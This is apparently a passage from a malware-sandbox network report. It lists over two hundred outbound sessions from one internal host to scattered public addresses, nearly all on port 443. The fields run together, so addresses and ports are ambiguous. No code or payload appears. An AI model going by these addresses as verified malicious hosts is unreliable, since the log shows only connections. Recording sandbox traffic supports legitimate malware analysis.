                                                25711192.168.2.2351136178.216.39.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25712192.168.2.2358876218.137.153.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25713192.168.2.2337440163.89.189.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25714192.168.2.2335856163.190.75.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25715192.168.2.2352686180.56.208.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25716192.168.2.236080842.69.90.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25717192.168.2.2353118192.135.222.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25718192.168.2.235359264.242.137.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25719192.168.2.235877044.24.158.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25720192.168.2.2359140208.67.212.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25721192.168.2.2339978178.92.205.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25722192.168.2.2336580173.147.101.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25723192.168.2.2339702122.60.95.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25724192.168.2.2334736122.180.227.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25725192.168.2.233695246.237.180.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25726192.168.2.2351938192.149.107.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25727192.168.2.233861048.118.20.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25728192.168.2.2345588197.248.83.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25729192.168.2.236045445.77.9.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25730192.168.2.2333704114.106.69.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25731192.168.2.2344568185.233.59.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25732192.168.2.2351500162.62.228.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25733192.168.2.2333642194.130.90.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25734192.168.2.234048275.71.234.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25735192.168.2.234385884.83.127.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25736192.168.2.2359904218.131.115.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25737192.168.2.2350108180.48.48.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25738192.168.2.2341038118.214.230.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25739192.168.2.2334872189.42.69.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25740192.168.2.2355446175.149.12.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25741192.168.2.2353720199.181.165.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25742192.168.2.2350286146.75.6.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25743192.168.2.234533681.198.212.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25744192.168.2.2349508182.77.246.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25745192.168.2.2353368160.203.124.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25746192.168.2.2340624204.138.248.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25747192.168.2.2345592184.112.151.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25748192.168.2.235035262.22.224.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25749192.168.2.235525844.220.42.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25750192.168.2.2358492156.201.167.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25751192.168.2.2334190109.161.213.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25752192.168.2.2350140128.97.2.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25753192.168.2.2341532155.117.54.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25754192.168.2.2356490174.157.26.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25755192.168.2.2344050178.48.20.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25756192.168.2.23394485.8.55.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25757192.168.2.234689263.247.1.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25758192.168.2.2333886222.215.204.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25759192.168.2.2348170218.85.22.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25760192.168.2.233288847.20.65.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25761192.168.2.235704447.140.29.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25762192.168.2.233327219.167.34.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25763192.168.2.234895867.43.164.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25764192.168.2.2341936157.72.117.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25765192.168.2.2335270129.12.233.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25766192.168.2.2356550129.228.63.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25767192.168.2.233573276.180.109.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25768192.168.2.2338328222.177.32.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25769192.168.2.2343370136.143.12.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25770192.168.2.2353720220.56.34.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25771192.168.2.234635696.129.93.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25772192.168.2.2346944113.160.45.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25773192.168.2.235606462.188.153.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25774192.168.2.233721867.51.122.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25775192.168.2.2333602221.192.49.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25776192.168.2.2349740163.212.34.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25777192.168.2.2344920157.100.85.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25778192.168.2.2340430222.112.102.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25779192.168.2.2343738199.216.59.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25780192.168.2.234706669.85.187.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25781192.168.2.2341240113.159.222.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25782192.168.2.2343130197.10.195.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25783192.168.2.23349945.41.183.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25784192.168.2.2345638164.20.78.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25785192.168.2.233745448.96.145.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25786192.168.2.235866696.5.192.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25787192.168.2.235160870.156.4.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25788192.168.2.2345354157.117.206.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25789192.168.2.2333850134.95.154.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25790192.168.2.234558448.12.167.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25791192.168.2.2348744213.31.226.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25792192.168.2.235291439.129.119.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25793192.168.2.234530089.171.165.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25794192.168.2.233708045.66.15.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25795192.168.2.2349504221.212.165.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25796192.168.2.234994461.141.32.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25797192.168.2.233367823.94.192.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25798192.168.2.2346306202.154.244.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25799192.168.2.234515262.160.132.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25800192.168.2.2336962111.217.69.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25801192.168.2.234969023.115.37.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25802192.168.2.2342942121.55.45.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25803192.168.2.2339940204.5.188.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25804192.168.2.234991070.195.116.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25805192.168.2.235702046.59.196.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25806192.168.2.2338698179.97.219.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25807192.168.2.2353544139.195.23.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25808192.168.2.2351156167.28.190.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25809192.168.2.2357210168.184.251.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25810192.168.2.233736462.149.148.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25811192.168.2.2345582180.85.224.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25812192.168.2.233595037.35.82.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25813192.168.2.2337720185.54.232.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25814192.168.2.235243223.202.239.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25815192.168.2.2354376112.138.69.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25816192.168.2.2349292103.53.165.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25817192.168.2.2340436148.176.73.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25818192.168.2.2340254123.153.155.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25819192.168.2.235652095.181.217.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25820192.168.2.234883097.199.95.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25821192.168.2.2360050118.252.238.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25822192.168.2.2340404205.96.9.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25823192.168.2.2336592213.176.150.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25824192.168.2.2347914213.193.42.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25825192.168.2.2335392184.160.108.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25826192.168.2.235965471.191.5.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25827192.168.2.234265672.180.116.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25828192.168.2.2337346101.160.168.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25829192.168.2.2358008222.96.74.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25830192.168.2.2353028123.217.183.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25831192.168.2.2356820172.51.28.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25832192.168.2.2345014204.191.85.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25833192.168.2.2350906100.61.238.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25834192.168.2.233790634.188.254.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25835192.168.2.235717838.101.164.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25836192.168.2.2354114173.200.115.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25837192.168.2.2339224164.64.152.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25838192.168.2.2353670219.230.243.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25839192.168.2.2346976122.60.186.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25840192.168.2.2339866199.48.180.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25841192.168.2.234052854.22.253.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25842192.168.2.2344778211.29.148.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25843192.168.2.23479344.144.214.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25844192.168.2.2359002106.115.143.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25845192.168.2.2333880153.156.51.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25846192.168.2.233769038.63.122.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25847192.168.2.2347702198.159.186.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25848192.168.2.2347034123.86.83.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25849192.168.2.233877667.70.66.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25850192.168.2.2354216209.219.239.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25851192.168.2.2339446174.208.203.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25852192.168.2.235536683.168.200.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25853192.168.2.233358894.64.3.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25854192.168.2.234700838.160.109.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25855192.168.2.2341488116.4.128.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25856192.168.2.235899675.173.149.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25857192.168.2.234087066.141.93.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25858192.168.2.2335270193.112.130.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25859192.168.2.2346520212.118.214.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25860192.168.2.2342230103.241.232.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25861192.168.2.233296461.12.55.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25862192.168.2.2342124168.70.86.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25863192.168.2.235674444.216.132.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25864192.168.2.2348988136.211.165.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25865192.168.2.2354646168.7.132.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25866192.168.2.23346068.112.10.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25867192.168.2.2353768168.21.120.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25868192.168.2.234711214.240.59.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25869192.168.2.235762435.31.95.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25870192.168.2.2337818221.35.144.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25871192.168.2.236007680.100.129.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25872192.168.2.233956297.136.184.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25873192.168.2.2350576116.237.225.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25874192.168.2.2348960126.129.155.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25875192.168.2.2335924113.55.62.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25876192.168.2.2356212189.149.178.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25877192.168.2.2359846152.250.101.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25878192.168.2.235994046.65.4.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25879192.168.2.234452613.216.195.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25880192.168.2.235388448.235.248.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25881192.168.2.2332808208.200.251.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25882192.168.2.234177023.73.153.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25883192.168.2.2332892196.74.38.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25884192.168.2.234016865.238.245.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25885192.168.2.2334854107.219.14.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25886192.168.2.23536885.77.255.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25887192.168.2.235985479.11.89.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25888192.168.2.2347178163.66.135.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25889192.168.2.2360588178.150.38.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25890192.168.2.235668050.144.123.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25891192.168.2.2344722176.163.3.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25892192.168.2.2347070210.112.157.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25893192.168.2.2333830202.26.50.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25894192.168.2.2356502180.242.43.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25895192.168.2.2338638144.68.13.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25896192.168.2.233709887.55.124.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25897192.168.2.2341020189.63.88.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25898192.168.2.2359810117.178.186.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25899192.168.2.2342668108.200.41.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25900192.168.2.2353172129.56.42.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25901192.168.2.234080476.118.176.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25902192.168.2.2346118208.12.19.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25903192.168.2.235192844.236.8.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25904192.168.2.2348456173.230.129.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25905192.168.2.2338056100.27.80.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25906192.168.2.2353770188.19.69.708080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25907192.168.2.234052823.199.219.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25908192.168.2.23608421.48.226.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25909192.168.2.235580287.217.95.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25910192.168.2.235617677.26.2.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25911192.168.2.235287440.27.61.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25912192.168.2.2358756220.157.213.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25913192.168.2.233856491.70.141.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25914192.168.2.234736077.142.208.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25915192.168.2.2346802190.7.91.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25916192.168.2.2357148184.90.148.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25917192.168.2.235977239.92.35.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25918192.168.2.234398690.128.41.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25919192.168.2.233339097.23.209.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25920192.168.2.234247881.128.8.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25921192.168.2.2356906201.195.173.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25922192.168.2.2335080109.131.68.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25923192.168.2.2336852220.129.85.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25924192.168.2.233399424.107.254.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25925192.168.2.2350898130.149.137.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25926192.168.2.2340996143.105.182.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25927192.168.2.2353668112.108.152.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25928192.168.2.2356238112.111.109.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25929192.168.2.235345837.11.4.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25930192.168.2.2348530151.214.212.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25931192.168.2.2339082145.122.173.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25932192.168.2.2349330210.95.148.190443
                                                TimestampBytes transferredDirectionData


